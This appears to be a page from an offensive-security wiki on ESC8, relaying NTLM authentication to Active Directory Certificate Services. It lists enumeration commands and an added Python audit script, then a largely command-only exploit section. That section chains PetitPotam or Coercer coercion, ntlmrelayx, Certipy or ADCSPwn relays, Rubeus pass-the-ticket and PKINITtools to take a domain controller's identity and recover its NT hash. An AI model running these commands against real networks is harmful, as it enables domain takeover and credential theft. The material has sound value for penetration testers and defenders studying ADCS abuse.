# ESC8

* <https://blog.truesec.com/2021/08/05/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory/>
* <https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/>
* <https://habr.com/ru/company/deiteriylab/blog/581758/>
* <https://habr.com/ru/companies/jetinfosystems/articles/846066/>

## Enumerate

Discover CES endpoints with certutil:

```
Cmd > certutil.exe -enrollmentServerURL -config CA01.megacorp.local\CA01
```

Discover CES endpoints with PowerShell:

```
PS > Get-CertificationAuthority | select name,enroll* | fl
```

Check a list of CA hosts for the web enrollment endpoint (`certfnsh.asp`) answering with NTLM authentication:

```
$ for ip in $(cat ~/ws/discover/hosts/ca.txt); do curl -sSLkI -u 'MEGACORP\snovvcrash:Passw0rd!' --ntlm "http://$ip/certsrv/certfnsh.asp" | grep -q -e 401 -e 200 && echo "[+] $ip" || echo "[-] $ip"; done
```
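The same check from the defender's side, as an added audit script (not part of the original page): it classifies each CA host's `/certsrv/certfnsh.asp` response against the ESC8 precondition, Windows (NTLM/Negotiate) authentication offered over plain HTTP, and flags HTTPS hosts where Extended Protection still has to be confirmed. The hostnames and responses in `SAMPLE_RESPONSES` are constructed placeholders; `probe()` is the live-probe helper for real hosts.

```python
import http.client
import ssl

# Constructed sample probe results standing in for live hosts:
# (scheme, status, list of WWW-Authenticate values). Hostnames are placeholders.
SAMPLE_RESPONSES = {
    "ca01.megacorp.local": ("http", 401, ["Negotiate", "NTLM"]),
    "ca02.megacorp.local": ("https", 401, ["Negotiate"]),
    "ca03.megacorp.local": ("http", 404, []),
}

def assess(scheme, status, www_auth):
    """Classify one certsrv probe against the ESC8 precondition: the enrollment
    page offers Windows auth (NTLM/Negotiate) over plain HTTP, where nothing
    binds the NTLM exchange to the channel. IIS sends one WWW-Authenticate
    header per scheme, so www_auth is a list of header values."""
    if status != 401:
        return "no Windows auth prompt on /certsrv (status %d)" % status
    offered = {m.strip().split()[0].upper()
               for v in www_auth for m in v.split(",") if m.strip()}
    if not offered & {"NTLM", "NEGOTIATE"}:
        return "non-Windows auth only: " + ", ".join(sorted(offered))
    if scheme == "http":
        return "ESC8: NTLM relayable (Windows auth over plain HTTP)"
    return "HTTPS with Windows auth: confirm EPA is Required and HTTP is disabled"

def probe(host, scheme="http", timeout=5.0):
    """Send one unauthenticated GET to the web enrollment endpoint and return
    (status, WWW-Authenticate values); the 401 challenge lists the schemes."""
    if scheme == "https":
        ctx = ssl.create_default_context()
        ctx.check_hostname, ctx.verify_mode = False, ssl.CERT_NONE  # audit, not trust
        conn = http.client.HTTPSConnection(host, timeout=timeout, context=ctx)
    else:
        conn = http.client.HTTPConnection(host, timeout=timeout)
    conn.request("GET", "/certsrv/certfnsh.asp")
    resp = conn.getresponse()
    values = resp.headers.get_all("WWW-Authenticate") or []
    conn.close()
    return resp.status, values

def audit(results):
    """Map host -> verdict for a dict shaped like SAMPLE_RESPONSES."""
    return {h: assess(s, st, wa) for h, (s, st, wa) in results.items()}

if __name__ == "__main__":
    for host, verdict in sorted(audit(SAMPLE_RESPONSES).items()):
        print(host + ": " + verdict)
```

For a live run, replace `SAMPLE_RESPONSES` with `{host: (scheme, *probe(host, scheme)) for host in targets}`.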

## Exploit

### ntlmrelayx

* <https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/>
* <https://github.com/fortra/impacket/pull/1101>
* <https://github.com/ExAndroidDev/impacket/tree/ntlmrelayx-adcs-attack>

```
$ ntlmrelayx.py -t http://CA01.megacorp.local/certsrv/certfnsh.asp -smb2support --adcs [--template VulnTemplate] --no-http-server --no-wcf-server --no-raw-server
$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11
PS > .\Rubeus.exe asktgt /user:DC1$ /domain:megacorp.local /dc:DC1.megacorp.local /certificate:<BASE64_PFX_CERT> /ptt
```

### PKINITtools

* <https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/>
* <https://github.com/dirkjanm/PKINITtools>
* <https://gist.github.com/snovvcrash/8b6a1a10e1f47439d16072c60cc2e099>

Back up the original `httpattack.py` and replace it with the one from the toolkit, editing the domain name and, if needed, the template (`DomainController` is the default; `KerberosAuthentication` also works):

```
$ sudo cp /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py.bak
$ subl ntlmrelayx/httpattack.py
$ sudo cp ntlmrelayx/httpattack.py /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py
```

Perform the relay, request a TGT via PKINIT with the obtained certificate, and recover the NT hash using the Kerberos U2U extension:

```
$ ntlmrelayx.py -t http://CA01.megacorp.local/certsrv/certfnsh.asp -smb2support --no-http-server --no-wcf-server --no-raw-server
$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11
$ python3 gettgtpkinit.py megacorp.local/'DC1$' -cert-pem cert.pem -key-pem privatekey.pem dc1.ccache
$ KRB5CCNAME=dc1.ccache python3 getnthash.py megacorp.local/'DC1$' -key 00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff
```

Revert the original `httpattack.py`:

```
$ sudo mv /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py.bak /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py
```

### Certipy

Start the relay server with Certipy:

```
$ certipy relay -ca 192.168.1.12 -template DomainController
```

### ADCSPwn

* <https://github.com/bats3c/ADCSPwn>

{% embed url="https://youtu.be/W9pUCVxe59Q" %}

Start a relay server:

```
PS > .\ADCSPwn.exe --adcs CA01.megacorp.local
```

Coerce the authentication, e.g. via [Coercer](https://github.com/p0dalirius/Coercer):

```
$ coercer coerce -u snovvcrash -p 'Passw0rd!' -t 192.168.1.11 -l VICTIM01 --auth-type http --http-port 8080
```
